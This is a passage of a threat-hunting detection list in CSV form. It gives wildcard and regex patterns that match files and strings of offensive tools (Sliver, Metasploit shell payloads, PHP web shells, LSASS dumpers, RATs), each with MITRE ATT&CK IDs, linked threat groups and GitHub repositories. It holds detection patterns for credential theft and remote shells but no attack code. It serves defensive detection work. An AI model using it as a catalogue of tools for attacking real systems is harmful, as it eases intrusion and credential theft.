"*SilentMoonwalk.exe*",".{0,1000}SilentMoonwalk\.exe.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","59481"
"*SilentMoonwalk.sln*",".{0,1000}SilentMoonwalk\.sln.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","59482"
"*SilentMoonwalk-master*",".{0,1000}SilentMoonwalk\-master.{0,1000}","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","N/A","9","8","760","100","2024-07-20T10:41:31Z","2022-12-04T13:30:33Z","59483"
"*SilentProcessExitRegistrySetter.cpp*",".{0,1000}SilentProcessExitRegistrySetter\.cpp.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","59484"
"*SilentProcessExitRegistrySetter.exe*",".{0,1000}SilentProcessExitRegistrySetter\.exe.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","59485"
"*SILENTTRINITY*",".{0,1000}SILENTTRINITY.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","59486"
"*silenttrinity*.dll*",".{0,1000}silenttrinity.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","59487"
"*silly.host.of.iodine.code.kryo.se*",".{0,1000}silly\.host\.of\.iodine\.code\.kryo\.se.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","59488"
"*SillyRAT.git*",".{0,1000}SillyRAT\.git.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","N/A","10","792","162","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z","59489"
"*sillyrat.py*",".{0,1000}sillyrat\.py.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","N/A","10","792","162","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z","59490"
"*silver*/beacon.go*",".{0,1000}silver.{0,1000}\/beacon\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59491"
"*silver*implant.go*",".{0,1000}silver.{0,1000}implant\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","59492"
"*SilverPoision/Rock-ON*",".{0,1000}SilverPoision\/Rock\-ON.{0,1000}","offensive_tool_keyword","Rock-ON","Rock-On is a all in one recon tool that will help your Recon process give a boost. It is mainley aimed to automate the whole process of recon and save the time that is being wasted in doing all this stuffs manually","T1590 - T1210.001 - T1190 - T1213","TA0007 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/SilverPoision/Rock-ON","1","1","N/A","N/A","N/A","3","297","69","2019-11-30T04:00:03Z","2019-06-10T04:42:32Z","59494"
"*Simone Margaritelli <evilsocket@gmail.com>*",".{0,1000}Simone\sMargaritelli\s\<evilsocket\@gmail\.com\>.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","59495"
"*SimoneLazzaris/ditty*",".{0,1000}SimoneLazzaris\/ditty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SimoneLazzaris/ditty","1","1","N/A","N/A","N/A","1","2","1","2022-03-10T16:15:14Z","2022-03-09T09:20:27Z","59496"
"*Simple code for creating a DLL for netsh helper DLLs*",".{0,1000}Simple\scode\sfor\screating\sa\sDLL\sfor\snetsh\shelper\sDLLs.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","59497"
"*Simple PHP backdoor by DK*",".{0,1000}Simple\sPHP\sbackdoor\sby\sDK.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php text webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","59498"
"*Simple powershell/C# to spawn a process under a different parent process*",".{0,1000}Simple\spowershell\/C\#\sto\sspawn\sa\sprocess\sunder\sa\sdifferent\sparent\sprocess.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","59499"
"*Simple Shellcode Runner.csproj*",".{0,1000}Simple\sShellcode\sRunner\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59500"
"*Simple Shellcode Runner.ps1*",".{0,1000}Simple\sShellcode\sRunner\.ps1.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59501"
"*Simple Shellcode Runner.vba*",".{0,1000}Simple\sShellcode\sRunner\.vba.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59502"
"*simple_dropper.ninja*",".{0,1000}simple_dropper\.ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","59503"
"*simple_php_web_shell_get.php*",".{0,1000}simple_php_web_shell_get\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59504"
"*simple_php_web_shell_get.php*",".{0,1000}simple_php_web_shell_get\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59505"
"*simple_php_web_shell_get__mini_v2.php*",".{0,1000}simple_php_web_shell_get__mini_v2\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59506"
"*simple_php_web_shell_get_mini.php*",".{0,1000}simple_php_web_shell_get_mini\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59507"
"*simple_php_web_shell_get_v2.php*",".{0,1000}simple_php_web_shell_get_v2\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59508"
"*simple_php_web_shell_get_v2.php*",".{0,1000}simple_php_web_shell_get_v2\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59509"
"*simple_php_web_shell_post.php*",".{0,1000}simple_php_web_shell_post\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59510"
"*simple_php_web_shell_post_mini.php*",".{0,1000}simple_php_web_shell_post_mini\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","59511"
"*SimpleBackdoorAdmin.dll*",".{0,1000}SimpleBackdoorAdmin\.dll.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59512"
"*SimpleBackdoorAdmin.dll*",".{0,1000}SimpleBackdoorAdmin\.dll.{0,1000}","offensive_tool_keyword","SimpleBackdoorAdmin","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59513"
"*SimpleBackdoorAdmin.exe*",".{0,1000}SimpleBackdoorAdmin\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59514"
"*SimpleBackdoorAdmin.exe*",".{0,1000}SimpleBackdoorAdmin\.exe.{0,1000}","offensive_tool_keyword","SimpleBackdoorAdmin","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SimpleBackdoorAdmin","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59515"
"*simplekeylogger.*",".{0,1000}simplekeylogger\..{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","59547"
"*SimpleNtSyscallFuzzer.v11.suo*",".{0,1000}SimpleNtSyscallFuzzer\.v11\.suo.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005  - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","1","N/A","N/A","7","2","145","25","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z","59548"
"*SimpleNTSyscallFuzzer-main\*",".{0,1000}SimpleNTSyscallFuzzer\-main\\.{0,1000}","offensive_tool_keyword","SimpleNTSyscallFuzzer","Fuzzer for Windows kernel syscalls.","T1055.011 - T1218","TA0005  - TA0007","N/A","N/A","Discovery","https://github.com/waleedassar/SimpleNTSyscallFuzzer","1","0","N/A","N/A","7","2","145","25","2024-01-25T02:39:31Z","2022-03-12T10:16:30Z","59549"
"*SimplyEmail.py*",".{0,1000}SimplyEmail\.py.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","N/A","5","10","953","228","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z","59550"
"*SimplyEmail-master*",".{0,1000}SimplyEmail\-master.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","N/A","5","10","953","228","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z","59551"
"*SimplySecurity/SimplyEmail*",".{0,1000}SimplySecurity\/SimplyEmail.{0,1000}","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","N/A","5","10","953","228","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z","59552"
"*SimShell - Simorgh Security MGZ*",".{0,1000}SimShell\s\-\sSimorgh\sSecurity\sMGZ.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","59553"
"*sin5678/gh0st*",".{0,1000}sin5678\/gh0st.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","1","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","59554"
"*SinclairCC.MakeMeAdmin.Properties*",".{0,1000}SinclairCC\.MakeMeAdmin\.Properties.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","59555"
"*SinclairMakeMeAdmin.adml*",".{0,1000}SinclairMakeMeAdmin\.adml.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","59556"
"*SinclairMakeMeAdmin.admx*",".{0,1000}SinclairMakeMeAdmin\.admx.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","1","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","59557"
"*single_reverse_tcp_shell.s*",".{0,1000}single_reverse_tcp_shell\.s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59558"
"*single_shell_bind_tcp.asm*",".{0,1000}single_shell_bind_tcp\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59559"
"*single_shell_reverse_tcp.asm*",".{0,1000}single_shell_reverse_tcp\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59560"
"*single_target_exploit.rb*",".{0,1000}single_target_exploit\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59561"
"*S-inject\S-inject.cpp*",".{0,1000}S\-inject\\S\-inject\.cpp.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","59563"
